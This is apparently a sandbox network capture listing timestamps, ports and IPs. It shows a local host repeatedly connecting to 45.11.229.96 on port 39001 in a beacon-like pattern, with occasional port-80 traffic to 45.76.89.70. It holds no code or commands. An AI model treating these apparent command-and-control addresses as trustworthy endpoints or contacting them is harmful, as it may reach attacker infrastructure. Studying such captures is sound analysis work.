Sep 19, 2024 02:28:41.019762993 CEST	39001	49965	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:41.779450893 CEST	39001	49965	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:41.779540062 CEST	49965	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:41.779649019 CEST	49965	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:41.784444094 CEST	39001	49965	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:41.888195992 CEST	49966	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:41.893058062 CEST	39001	49966	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:41.893132925 CEST	49966	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:42.431066036 CEST	49966	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:42.436042070 CEST	39001	49966	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:42.436137915 CEST	49966	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:42.440896988 CEST	39001	49966	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:42.762912035 CEST	39001	49966	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:42.763091087 CEST	49966	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:42.807087898 CEST	49966	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:42.811975002 CEST	39001	49966	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:42.928874969 CEST	49967	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:42.934885979 CEST	39001	49967	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:42.934976101 CEST	49967	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:42.956559896 CEST	49967	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:42.961385012 CEST	39001	49967	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:42.961453915 CEST	49967	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:42.967677116 CEST	39001	49967	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:43.566896915 CEST	39001	49967	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:43.567151070 CEST	49967	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:43.567151070 CEST	49967	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:43.572164059 CEST	39001	49967	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:43.788388014 CEST	49968	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:43.793353081 CEST	39001	49968	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:43.793425083 CEST	49968	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:43.925142050 CEST	49968	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:43.929949045 CEST	39001	49968	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:43.930015087 CEST	49968	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:43.934946060 CEST	39001	49968	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:45.108669043 CEST	39001	49968	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:45.108736992 CEST	49968	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:45.108788967 CEST	39001	49968	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:45.108835936 CEST	49968	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:45.108835936 CEST	49968	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:45.108911991 CEST	39001	49968	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:45.108954906 CEST	49968	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:45.216829062 CEST	49969	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:45.526664972 CEST	39001	49968	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:45.526710033 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:28:45.526771069 CEST	49968	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:45.528534889 CEST	39001	49968	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:45.528601885 CEST	39001	49969	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:45.528798103 CEST	49969	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:45.552583933 CEST	49969	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:45.557564020 CEST	39001	49969	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:45.557648897 CEST	49969	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:45.562858105 CEST	39001	49969	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:45.575025082 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:28:46.201735973 CEST	39001	49969	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:46.201819897 CEST	49969	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:46.207595110 CEST	49969	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:46.212439060 CEST	39001	49969	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:46.395798922 CEST	49970	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:46.400790930 CEST	39001	49970	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:46.400880098 CEST	49970	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:47.254952908 CEST	49970	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:47.259911060 CEST	39001	49970	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:47.260014057 CEST	49970	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:47.264839888 CEST	39001	49970	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:47.580310106 CEST	39001	49970	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:47.580461979 CEST	49970	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:47.580539942 CEST	49970	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:47.585334063 CEST	39001	49970	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:47.685170889 CEST	49971	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:47.690273046 CEST	39001	49971	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:47.690357924 CEST	49971	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:47.724925041 CEST	49971	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:47.729800940 CEST	39001	49971	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:47.729881048 CEST	49971	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:47.734720945 CEST	39001	49971	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:48.401525974 CEST	39001	49971	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:48.401607037 CEST	49971	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:48.401726961 CEST	49971	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:48.409105062 CEST	39001	49971	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:48.513485909 CEST	49972	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:48.518302917 CEST	39001	49972	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:48.518420935 CEST	49972	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:48.552493095 CEST	49972	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:48.557284117 CEST	39001	49972	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:48.557375908 CEST	49972	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:48.562186956 CEST	39001	49972	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:49.266772032 CEST	39001	49972	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:49.266865969 CEST	49972	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:49.267015934 CEST	49972	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:49.272099018 CEST	39001	49972	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:49.373353004 CEST	49973	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:49.378413916 CEST	39001	49973	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:49.378500938 CEST	49973	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:49.409260988 CEST	49973	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:49.414388895 CEST	39001	49973	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:49.414450884 CEST	49973	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:49.419323921 CEST	39001	49973	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:50.001234055 CEST	39001	49973	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:50.001322031 CEST	49973	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:50.001456976 CEST	49973	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:50.006231070 CEST	39001	49973	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:50.107069016 CEST	49974	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:50.112020016 CEST	39001	49974	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:50.112123013 CEST	49974	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:50.978307009 CEST	49974	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:50.983315945 CEST	39001	49974	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:50.986346006 CEST	49974	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:50.991198063 CEST	39001	49974	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:51.479073048 CEST	39001	49974	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:51.479178905 CEST	49974	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:51.479285002 CEST	49974	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:51.484194040 CEST	39001	49974	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:51.591456890 CEST	49975	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:51.596471071 CEST	39001	49975	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:51.596573114 CEST	49975	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:51.946563005 CEST	49975	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:51.951595068 CEST	39001	49975	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:51.951788902 CEST	49975	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:51.956754923 CEST	39001	49975	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:52.220500946 CEST	39001	49975	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:52.220637083 CEST	49975	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:52.220715046 CEST	49975	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:52.225472927 CEST	39001	49975	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:52.325773954 CEST	49976	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:52.330621958 CEST	39001	49976	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:52.330712080 CEST	49976	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:52.758428097 CEST	49976	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:52.763394117 CEST	39001	49976	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:52.763475895 CEST	49976	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:52.768250942 CEST	39001	49976	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:52.956355095 CEST	39001	49976	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:52.956434965 CEST	49976	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:52.956563950 CEST	49976	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:52.961353064 CEST	39001	49976	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:53.075633049 CEST	49977	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:53.080703020 CEST	39001	49977	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:53.082343102 CEST	49977	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:53.866820097 CEST	49977	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:53.873723030 CEST	39001	49977	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:53.874327898 CEST	49977	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:53.879172087 CEST	39001	49977	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:54.272937059 CEST	39001	49977	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:54.273011923 CEST	49977	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:54.273153067 CEST	49977	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:54.285758018 CEST	39001	49977	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:54.388334036 CEST	49978	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:54.396469116 CEST	39001	49978	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:54.396555901 CEST	49978	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:54.421149015 CEST	49978	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:54.425903082 CEST	39001	49978	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:54.425971985 CEST	49978	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:54.436520100 CEST	39001	49978	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:55.050549984 CEST	39001	49978	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:55.050618887 CEST	49978	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:55.050762892 CEST	49978	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:55.056881905 CEST	39001	49978	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:55.169610977 CEST	49979	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:55.174484015 CEST	39001	49979	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:55.174566984 CEST	49979	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:55.195971012 CEST	49979	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:55.205018997 CEST	39001	49979	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:55.205087900 CEST	49979	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:55.209920883 CEST	39001	49979	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:55.804163933 CEST	39001	49979	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:55.804339886 CEST	49979	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:55.806299925 CEST	49979	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:55.811052084 CEST	39001	49979	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:55.919399023 CEST	49980	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:55.924324036 CEST	39001	49980	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:55.924407959 CEST	49980	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:55.945394039 CEST	49980	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:55.950177908 CEST	39001	49980	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:55.950242996 CEST	49980	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:55.954992056 CEST	39001	49980	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:56.573160887 CEST	39001	49980	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:56.573230982 CEST	49980	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:56.573369026 CEST	49980	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:56.578129053 CEST	39001	49980	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:56.685028076 CEST	49981	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:56.689928055 CEST	39001	49981	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:56.690536976 CEST	49981	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:57.445765972 CEST	49981	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:57.450706005 CEST	39001	49981	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:57.450794935 CEST	49981	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:57.455555916 CEST	39001	49981	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:57.876023054 CEST	39001	49981	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:57.876107931 CEST	49981	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:57.876246929 CEST	49981	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:57.881023884 CEST	39001	49981	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:57.982053041 CEST	49982	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:57.987020016 CEST	39001	49982	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:57.987103939 CEST	49982	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:58.012284040 CEST	49982	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:58.017213106 CEST	39001	49982	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:58.017318964 CEST	49982	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:58.022068977 CEST	39001	49982	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:58.703145027 CEST	39001	49982	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:58.703314066 CEST	49982	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:58.706305027 CEST	49982	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:58.711080074 CEST	39001	49982	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:58.836004019 CEST	49983	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:58.840905905 CEST	39001	49983	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:58.840977907 CEST	49983	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:58.867990971 CEST	49983	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:58.872888088 CEST	39001	49983	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:58.872967005 CEST	49983	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:58.877851963 CEST	39001	49983	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:59.472567081 CEST	39001	49983	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:59.472646952 CEST	49983	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:59.472776890 CEST	49983	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:59.477643013 CEST	39001	49983	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:59.591527939 CEST	49984	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:59.596590042 CEST	39001	49984	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:59.596681118 CEST	49984	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:59.627465010 CEST	49984	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:59.632337093 CEST	39001	49984	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:59.632410049 CEST	49984	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:59.637198925 CEST	39001	49984	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:00.252698898 CEST	39001	49984	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:00.252784967 CEST	49984	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:00.252897024 CEST	49984	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:00.257693052 CEST	39001	49984	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:00.356931925 CEST	49985	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:00.361876011 CEST	39001	49985	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:00.361972094 CEST	49985	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:00.383943081 CEST	49985	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:00.388755083 CEST	39001	49985	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:00.388818979 CEST	49985	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:00.393672943 CEST	39001	49985	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:01.033848047 CEST	39001	49985	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:01.033946991 CEST	49985	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:01.437378883 CEST	49985	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:01.442337990 CEST	39001	49985	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:01.544390917 CEST	49986	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:01.549494028 CEST	39001	49986	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:01.549580097 CEST	49986	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:01.574853897 CEST	49986	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:01.579790115 CEST	39001	49986	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:01.579860926 CEST	49986	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:01.584697008 CEST	39001	49986	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:01.728518963 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:29:01.733501911 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:29:01.922020912 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:29:01.981386900 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:29:02.210135937 CEST	39001	49986	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:02.210191011 CEST	49986	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:02.210303068 CEST	49986	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:02.215100050 CEST	39001	49986	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:02.325709105 CEST	49987	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:02.330686092 CEST	39001	49987	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:02.330796957 CEST	49987	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:02.351811886 CEST	49987	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:02.356570959 CEST	39001	49987	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:02.356645107 CEST	49987	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:02.361423016 CEST	39001	49987	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:02.975554943 CEST	39001	49987	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:02.975640059 CEST	49987	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:02.975749016 CEST	49987	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:02.980482101 CEST	39001	49987	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:03.091315031 CEST	49988	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:03.096256971 CEST	39001	49988	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:03.096349955 CEST	49988	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:03.117527008 CEST	49988	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:03.122569084 CEST	39001	49988	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:03.122632980 CEST	49988	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:03.127434015 CEST	39001	49988	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:03.726959944 CEST	39001	49988	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:03.727025032 CEST	49988	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:03.727149010 CEST	49988	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:03.731933117 CEST	39001	49988	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:03.841412067 CEST	49989	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:03.846398115 CEST	39001	49989	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:03.846478939 CEST	49989	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:03.868537903 CEST	49989	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:03.873397112 CEST	39001	49989	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:03.873550892 CEST	49989	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:03.878329992 CEST	39001	49989	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:04.490269899 CEST	39001	49989	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:04.493427038 CEST	49989	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:04.493427038 CEST	49989	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:04.498285055 CEST	39001	49989	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:04.607104063 CEST	49990	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:04.612104893 CEST	39001	49990	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:04.612781048 CEST	49990	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:04.648627996 CEST	49990	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:04.653558969 CEST	39001	49990	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:04.656573057 CEST	49990	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:04.661418915 CEST	39001	49990	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:05.251365900 CEST	39001	49990	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:05.251440048 CEST	49990	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:05.251774073 CEST	49990	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:05.256551027 CEST	39001	49990	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:05.356973886 CEST	49991	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:05.362910986 CEST	39001	49991	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:05.363009930 CEST	49991	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:05.388705015 CEST	49991	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:05.394798994 CEST	39001	49991	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:05.394865036 CEST	49991	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:05.400959969 CEST	39001	49991	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:06.040502071 CEST	39001	49991	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:06.040672064 CEST	49991	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:06.040713072 CEST	49991	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:06.045480013 CEST	39001	49991	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:06.153852940 CEST	49992	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:06.158850908 CEST	39001	49992	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:06.158947945 CEST	49992	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:06.182477951 CEST	49992	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:06.187340975 CEST	39001	49992	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:06.187432051 CEST	49992	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:06.192290068 CEST	39001	49992	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:06.967269897 CEST	39001	49992	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:06.967380047 CEST	49992	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:06.967469931 CEST	49992	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:06.972204924 CEST	39001	49992	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:07.075918913 CEST	49993	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:07.080857038 CEST	39001	49993	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:07.080966949 CEST	49993	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:07.322510958 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:29:07.481266975 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:29:07.916452885 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:29:07.981245995 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:29:08.441648960 CEST	49993	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:08.458120108 CEST	39001	49993	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:08.458378077 CEST	49993	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:08.463653088 CEST	39001	49993	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:08.773305893 CEST	39001	49993	45.11.229.96	192.168.2.5
